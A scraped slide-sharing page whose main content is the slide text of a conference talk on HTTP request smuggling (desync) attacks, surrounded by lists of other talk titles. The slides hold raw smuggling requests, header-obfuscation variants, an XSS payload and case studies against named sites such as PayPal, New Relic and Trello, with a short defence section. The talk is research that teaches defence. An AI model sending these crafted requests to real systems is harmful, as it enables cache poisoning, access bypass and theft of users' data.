DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksFelipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationFelipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncFelipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesFelipe Prado
 

Mehr von Felipe Prado (20)

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got ants
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryption
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a government
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interface
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portals
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devices
 

Kürzlich hochgeladen

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 

Kürzlich hochgeladen (20)

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

DEF CON 27- ALBINOWAX - http desync attacks

  • 1. HTTP DESYNC ATTACKS SMASHING INTO THE CELL NEXT DOOR James Kettle
  • 2. The Fear Theory Q) What topic am I really scared of? A) HTTP Request Smuggling Hiding Wookiees in HTTP First documented by Watchfire in 2005 "You will not earn bounties" "You will certainly not be considered like a white hat"
  • 3. • Theory & Methodology • Exploitation Case Studies • Defence • Q&A Outline
  • 6. Desynchronizing: the classic approach POST / HTTP/1.1 Host: example.com Content-Length: 6 Content-Length: 5 12345G Unknown method GPOST Frontend sees this Backend sees this POST / HTTP/1.1 Host: example.com …
  • 7. Desynchronizing: the chunked approach POST / HTTP/1.1 Host: example.com Content-Length: 66 Transfer-Encoding: chunked 0 GPOST / HTTP/1.1 … Frontend sees this Backend sees this Unknown method GPOST
  • 8. Desynchronizing: the TE.CL approach POST / HTTP/1.1 Host: example.com Content-Length: 3 Transfer-Encoding: chunked 6 PREFIX 0 POST / HTTP/1.1 Host: example.com Frontend sees this Backend sees this
  • 9. Forcing desync If a message is received with both a Transfer-Encoding header field and a Content- Length header field, the latter MUST be ignored. – RFC 2616 #4.4.3 Transfer-Encoding : chunked Transfer-Encoding: xchunked GET / HTTP/1.1 Transfer-Encoding: chunked Transfer-Encoding: chunked Content-Length: 123 Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:[tab]chunked X: X[n]Transfer-Encoding: chunked
  • 11. Detecting desync POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 0 X CL.CL: backend response TE.TE: backend response TE.CL: timeout CL.TE: socket poison POST /about HTTP/1.1 Host: example.com Transfer-Encoding: chunked Content-Length: 6 3 abc Q CL.CL: backend response TE.TE: frontend response TE.CL: frontend response CL.TE: timeout
  • 12. Confirming desync POST /search HTTP/1.1 Content-Length: 51 Transfer-Encoding: zchunked 11 =x&q=smuggling&x= 0 GET /404 HTTP/1.1 X: X POST /search HTTP/1.1 Content-Length: 4 Transfer-Encoding: zchunked 96 GET /404 HTTP/1.1 X: X=1&q=smugging&x= Host: example.com Content-Length: 100 x= 0 POST /search HTTP/1.1 Host: example.com Triggers 404 if vulnerable POST /search HTTP/1.1 Host: example.com …
  • 14. Bypassing rules POST / HTTP/1.1 Host: software-vendor.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: software-vendor.com X: X GET / HTTP/1.1 Host: software-vendor.com HTTP/1.1 200 OK Please log in
  • 15. Bypassing rewrites POST / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 Content-Length: 200 Transfer-Encoding : chunked 0 GET / HTTP/1.1 Host: security-vendor.com X-Forwarded-For: 127.0.0.1 X: XGET… $300 xyz.burpcollaborator.net
  • 16. Request reflection POST / HTTP/1.1 Host: login.newrelic.com Content-Length: 142 Transfer-Encoding: chunked Transfer-Encoding: x 0 POST /login HTTP/1.1 Host: login.newrelic.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 … login[email]=asdf Please ensure that your email and password are correct. <input id="email" value="asdfPOST /login HTTP/1.1 Host: login.newrelic.com X-Forwarded-For: 81.139.39.150 X-Forwarded-Proto: https X-TLS-Bits: 128 X-TLS-Cipher: ECDHE-RSA-AES128-GCM- SHA256 X-TLS-Version: TLSv1.2 x-nr-external-service: external POST /login HTTP/1.1 Host: login.newrelic.com
  • 17. Exploring HTTP/1.1 301 Moved Permanently Location: https://staging-alerts.newrelic.com/ GET / HTTP/1.1 Host: staging-alerts.newrelic.com GET / HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 404 Not Found Action Controller: Exception caught GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https HTTP/1.1 200 OK Not authorized with header: GET /revision_check HTTP/1.1 Host: staging-alerts.newrelic.com X-Forwarded-Proto: https X-nr-external-service: 1 HTTP/1.1 403 Forbidden Forbidden
  • 18. Exploring POST /login HTTP/1.1 Host: login.newrelic.com Content-Length: 564 Transfer-Encoding: chunked Transfer-encoding: cow 0 POST /internal_api/934454/session HTTP/1.1 Host: alerts.newrelic.com X-Forwarded-Proto: https Service-Gateway-Account-Id: 934454 Service-Gateway-Is-Newrelic-Admin: true Content-Length: 6 … x=123 { "user": { "account_id": 934454, "is_newrelic_admin": true }, "current_account_id": 934454 … } GET… +$3,000 $3,300
  • 19. Involuntary request storage POST /1/cards HTTP/1.1 Host: trello.com Transfer-Encoding:[tab]chunked Content-Length: 4 9f PUT /1/members/1234 HTTP/1.1 Host: trello.com Content-Type: application/x-www-form-urlencoded Content-Length: 400 x=x&csrf=1234&username=testzzz&bio=cake 0 GET / HTTP/1.1 Host: trello.com +$1,800 +$2,500 $7,600
  • 20. Harmful responses POST / HTTP/1.1 Host: saas-app.com Content-Length: 4 Transfer-Encoding : chunked 10 =x&csrf=token&x= 66 POST /index.php HTTP/1.1 Host: saas-app.com Content-Length: 100 SAML=a"><script>alert(1)</script> 0 HTTP/1.1 200 OK … <input name="SAML" value="a"><script>alert(1) </script> 0 POST / HTTP/1.1 Host: saas-app.com Cookie: … "/> POST / HTTP/1.1 Host: saas-app.com Cookie: … +$2,000 $9,600
  • 21. Accidental Cache Poisoning POST / HTTP/1.1 Host: redacted.com Content-Length: 45 Transfer-Encoding: chunked 0 POST / HTTP/1.1 Host: 52.16.21.24 X: X HTTP/1.1 301 Moved Permanently Location: https://52.16.21.24/ GET /images/x.png HTTP/1.1 Frontend perspective GET /images/x.png HTTP/1.1
  • 22. Web Cache Deception++ POST / HTTP/1.1 Transfer-Encoding: blah 0 GET /account/settings HTTP/1.1 X: X HTTP/1.1 200 OK Your payment history … GET /static/site.js HTTP/1.1 Sensitive responses with fixed, uncached extensions Sensitive POST responses Frontend perspective Expected habitat: GET /static/site.js HTTP/1.1 Cookie: sessionid=xyz
  • 23. CDN Chaining POST /cow.jpg HTTP/1.1 Host: redacted.com Content-Type: application/x-www-form-urlencoded Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: www.redhat.com X: X Red Hat - We make open source technologies for the enterprise GET…
  • 24. Chaining DOM Problems GET /assets/idx?redir=//redhat.com@evil.net/ HTTP/1.1 Host: www.redhat.com <script> var destination = getQueryParam('redir') [low quality filtering] document.location = destination </script> POST /en/search?dest=../assets/idx?redir=… HTTP/1.1 Host: www.redhat.com HTTP/1.1 301 Found Location: /assets/idx?redir=//redhat.co… Runs on unknown URL in victim's browser Solution: chain a server-side local redirect
  • 25. 'Harmless' responses POST /etc/libs/xyz.js HTTP/1.1 Host: redacted.com Content-Length: 57 Transfer-Encoding: chunked 0 POST /etc HTTP/1.1 Host: burpcollaborator.net X: X HTTP/1.1 301 Moved Permanently Location: https://burpcollaborator.net/etc/ GET /etc/libs/xyz.js HTTP/1.1 … +$550 +$750 +$1,000 +$2,000 +$5,000 +$15,000* $31,900
  • 26. Web Cache Poisoning POST /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Content-Length: 61 Transfer-Encoding: chunked 0 GET /webstatic HTTP/1.1 Host: skeletonscribe.net X: XGET /webstatic/r/fb/fb-all-prod.pp2.min.js HTTP/1.1 Host: c.paypal.com Connection: close HTTP/1.1 302 Found Location: http://skeletonscribe.net , c.paypal.com/webstatic/ ? ?
  • 28. Wrapped exploits GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 403 Forbidden Server: AkamaiGHost <HTML><HEAD> <TITLE>Access Denied</TITLE> </HEAD> GET / HTTP/1.1 Host: c.paypal.com Content-Length: 5 Transfer-Encoding: chunked 0 HTTP/1.1 200 OK … +$20,000 $70,800
  • 30. Tooling • Support manual content-length & chunking • Don't proxy testers Safety • Frontend: Normalize ambiguous requests – RFC 7230 • Frontend: Use HTTP/2 to talk to backend • Backend: Drop request & connection DEFENCE
  • 32. • Detection doesn't have to be dangerous • HTTP parsing is security critical • Complexity is the enemy TAKEAWAYS @albinowax Email: james.kettle@portswigger.net